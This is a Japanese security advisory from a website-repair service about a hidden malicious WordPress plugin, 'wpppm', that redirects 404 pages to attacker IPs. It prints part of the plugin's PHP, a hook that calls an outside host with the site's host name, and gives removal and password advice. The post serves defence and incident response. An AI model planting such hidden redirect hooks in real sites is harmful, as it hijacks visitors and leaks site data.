WordPress等Webサイトの改ざん復旧代行・セキュリティサービスならWebRepair(ウェブリペア)。wordpressサイト等の各種Webサイト改ざんについて、バックアップがなくても復旧可能です。お気軽にご依頼ください。
電気通信事業者 A-27-14430
0120-980-939
受付時間 10:00~18:00(土・日・祝日除く)
公開日:2013年11月25日
最終更新日:2015年7月29日

 この記事は約 3 分で読めます。

悪意のあるプラグイン、「wpppm」についての情報です。

リンク切れで404エラーになってしまうと、そのURLをたたいた際に別のページに転送されるという仕組みです。

.htaccessやphpファイルの改ざんではないので、base64で改ざんされた経験がある方はまずそれを疑うかと思いますが、プラグインとして存在するためそれではわかりません。

プラグインディレクトリを開くと「wpppm」という名称のプラグインが存在している状態ですが、管理画面からプラグイン一覧を見ても表示されていませんので必ずSCPなどでサーバー内を確認してください。

sec1

内容物は左のとおりです。

.kというディレクトリ、そしてwpppm.phpというファイルで構成されています。

なお、.kフォルダ内には以下のようにファイルが含まれています。

sec2このファイルをテキストエディタで開くとIPアドレスが書かれており、そのサイトに転送される仕組みです。

なお、このファイル内にあったIPアドレスは91.207.60.62でしたが、これで検索すると感染していると見られるサイトがあるのがわかります。

さて、wpppm.phpのなかには、以下のようなソースが含まれています。

これにより、404の際に先の転送先サイトが表示されるという仕組みです。

実際のコードの一部

function fourofour()
{
srand(466936014);

$tourl = 300;
$tofile = 3600;
$ver = 4;
$u = "http://83.133.123.174/v.html?v=$ver&h=" . urlencode($_SERVER['HTTP_HOST']);

@error_reporting(error_reporting()&~E_NOTICE);

if(function_exists("add_action"))
{
add_action("404_template", "fourofour");
}
else
{
fourofour();
}

対応策

プラグインディレクトリから、wpppmをすべて削除してください。

またBFAによる総当り攻撃や辞書攻撃で侵入されている可能性が高いため、必ずパスワードを変更してください。

なお、ユーザーIDがadminの場合はこうした攻撃の標的にされやすいため、別のユーザー名を管理者として設定し、adminユーザーは削除することをお勧めします。

この記事のキーワード

この記事の著者

WebRepairチーム
記事一覧

PR



著者一覧